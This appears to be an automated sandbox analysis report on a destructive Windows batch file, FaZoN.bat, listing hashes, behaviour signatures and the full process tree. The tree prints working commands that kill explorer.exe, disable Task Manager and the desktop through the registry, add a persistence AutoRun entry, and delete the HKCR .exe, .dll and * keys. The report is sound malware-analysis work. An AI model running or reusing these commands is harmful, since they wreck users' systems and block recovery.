Analysis

  • max time kernel
    132s
  • max time network
    60s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    02-03-2024 20:26

General

  • Target

    TrashMalwares-main/FaZoN.bat

  • Size

    1KB

  • MD5

    2a2c2cca38f2e34ee666d4534834dcbb

  • SHA1

    8ffa496f4e56c6406f8f965059483125966c6fdd

  • SHA256

    6397c16efa9b0ff4732002d37a948192b1df49c0c2c927806622fa59d3ac1b46

  • SHA512

    e05a896d8bcad42c04b69c14be3b625d1f586049b2a5925d08bae47f47429b44669904e22daaf94c003bbd697957bddf6067e1aaccc9dd4cb7c607a1d78686d0

Score
8/10

Malware Config

Signatures

  • Disables Task Manager via registry modification
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 7 IoCs
  • Modifies registry key 1 TTPs 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 29 IoCs
  • Suspicious use of SendNotifyMessage 17 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\FaZoN.bat"
    1⤵
    • Deletes itself
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2068
    • C:\Windows\system32\msg.exe
      msg * Gosha created by GGmex your computer infected
      2⤵
        PID:2612
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im explorer.exe
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2648
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d C:\Windows\explorer.exe /f
        2⤵
        • Modifies registry key
        PID:2708
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        2⤵
        • Modifies registry key
        PID:2572
      • C:\Windows\system32\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
        2⤵
        • Modifies registry key
        PID:2908
      • C:\Windows\explorer.exe
        explorer.exe
        2⤵
        • Modifies Installed Components in the registry
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2444
      • C:\Windows\system32\msg.exe
        msg * Your desktop has been crashed
        2⤵
          PID:2876
        • C:\Windows\system32\reg.exe
          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          2⤵
          • Modifies registry key
          PID:2668
        • C:\Windows\system32\msg.exe
          msg * Your windows infected by gosha :)
          2⤵
            PID:2584
          • C:\Windows\system32\reg.exe
            reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\syste m32\gosha.bat" /f
            2⤵
              PID:2464
            • C:\Windows\system32\msg.exe
              msg * Deleted files
              2⤵
                PID:2412
              • C:\Windows\system32\msg.exe
                msg * Your system has been removed...
                2⤵
                  PID:2452
                • C:\Windows\system32\msg.exe
                  msg * Click OK
                  2⤵
                    PID:1844
                  • C:\Windows\system32\cmd.exe
                    cmd
                    2⤵
                      PID:3032
                    • C:\Windows\system32\reg.exe
                      reg delete HKCR/.exe
                      2⤵
                        PID:2460
                      • C:\Windows\system32\reg.exe
                        reg delete HKCR/.dll
                        2⤵
                          PID:2036
                        • C:\Windows\system32\reg.exe
                          reg delete HKCR/*
                          2⤵
                            PID:2148
                          • C:\Windows\system32\cmd.exe
                            cmd
                            2⤵
                              PID:2388

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • memory/2444-4-0x00000000040C0000-0x00000000040C1000-memory.dmp

                            Filesize

                            4KB

                          • memory/2444-5-0x00000000040C0000-0x00000000040C1000-memory.dmp

                            Filesize

                            4KB

                          • memory/2444-9-0x00000000037B0000-0x00000000037C0000-memory.dmp

                            Filesize

                            64KB